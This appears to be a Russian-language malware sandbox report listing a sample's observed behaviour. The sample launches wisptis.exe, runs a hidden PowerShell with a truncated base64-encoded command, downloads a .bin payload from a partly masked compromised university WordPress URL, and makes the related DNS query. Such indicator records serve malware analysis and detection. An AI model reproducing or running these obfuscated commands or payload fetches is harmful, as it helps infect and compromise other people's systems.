Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco IwAjACMAZAB5AGIAYwB2AGwACgAkAHYAaABkAGYAawB4AHAAIAA9ACAAIgBEAHMASgBEAHYATQBHAFoAbwBOAFMAegBqAEsASwAiADsACgAkAG0AcwBoAHIAegBnAGcAPQAiAHYAegBmAGwAdwB0ACIAOwAKACQAcgB1AHEAaQBtAGYAbwA9ACQAZQB...
- http://me#######ca.ifc-riodosul.edu.br/wp-content/uploads/2019/08/FergKLrS.bin
- DNS ASK me#######ca.ifc-riodosul.edu.br
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco IwAjACMAZAB5AGIAYwB2AGwACgAkAHYAaABkAGYAawB4AHAAIAA9ACAAIgBEAHMASgBEAHYATQBHAFoAbwBOAFMAegBqAEsASwAiADsACgAkAG0AcwBoAHIAegBnAGcAPQAiAHYAegBmAGwAdwB0ACIAOwAKACQAcgB1AHEAaQBtAGYAbwA9ACQAZQB...' (со скрытым окном)